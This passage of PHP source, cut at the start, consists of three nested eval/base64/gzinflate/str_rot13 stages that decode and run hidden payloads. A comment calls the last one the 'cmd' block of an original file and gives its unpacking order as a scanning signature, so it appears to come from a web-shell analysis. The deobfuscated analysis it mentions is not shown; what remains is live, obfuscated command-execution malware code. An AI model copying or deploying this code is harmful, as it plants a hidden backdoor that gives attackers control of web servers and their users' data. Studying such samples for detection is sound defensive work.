pu5udm/81Vj6QlzbbA5rzPtTJMUSadH6ibmyjn1um09926N7C8UFUVI++x97BnmGL8v83aP+rpg6PhhAcHt39TVj30SbxF1s/7Ci/0Pt98Nj+5u/A4f9b3Z8/k8O7ljtej6ztkVG8y4/3SFhqUd79cy245/8nHxAK+SBfAf/UQMkjWf6/jP/4Nx56gap5vk8dIWYlW1O4S43QBTRWeqIQ1iiEIIrpb4YUboK+K70GMGyHMZ2uMZ0GMEjgfOQZdwDHyW4c6TWOZwBU3VASAX8QHMA0O4wpucaUDGB3uioKD0ydBrBLh7HE10viASwNx0NE6oPqHp7Mw9hveHmxALZJt0gCiqvAABZyjcWHqlavkjyRAjCjwBcgoDSR4FfJ0fwmbj6GqX0DrMqCHDYAGfTtB+VCKejkA6BWDPrl8+bqqUJYIwieSxAGuVAw1SWRsD+mBnoUocpuivGPyxH7uBz86R45kh+QI2xDjnhM9aw3KCY/LAcf/7gcsT1lxH0e9TfkS8JcYcqhT32kV4CQw772Hw==')))))
?>
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('jY9deMIwFIb/yiEIqcOPXYwxTQTnSethcXMirCIhDckpKJlaWlP765fOIWZKuwq8z3ueZjL1wmZ6MaJSibJR/kTWtUhenOgAYfsJWS+FynjZmAO3VxVX/+BAOPrW8sa3HqMuugy0ti3U4VlPnd7f5TRjdFpySFFfC4FJ4DA7VRsD2j2OHbZaAlR0RxBZFtnb8KGb6G75TBrRGt/ABHV6sBDGCaO9ZNNGF4+OUlhQZM+lThdXxCHKazwmMIIen7P0haVbbX754zJ0Z2pSRfa8YPOML9IN3QWRtNoIYRqrsLPVfn+RxxJhNkKwrCpytYYYtkD+uPJMxvhltVe/txDYkQS6M6NfPxkAbJ+t1ywlg6toIf+PsJ98AQ==')))))?>
<?php
// Packed stage, last of the three eval() wrappers in the original file; by position and
// size it appears to correspond to the `cmd` block in the deobfuscated output above.
// Unpacking order, innermost first: base64_decode -> str_rot13 -> gzinflate -> str_rot13;
// the resulting text is then handed to eval().
// The nested call prefix eval(str_rot13(gzinflate(str_rot13(base64_decode( is shared by
// all three stages and makes a practical string for static scanning of web roots.
// Analyse statically, as the deobfuscator output above does, rather than executing.
eval(str_rot13(gzinflate(str_rot13(base64_decode('KyvWKFhYK1fXQ4lqDWXxCGVmj0kqqCpHitXUrEkoKihaRUOyVkEtskaySUMBiivYKmCqtElVy1ZYL6rSAKkA8qDa9KH6CsuKrBV3AQ==')))))?>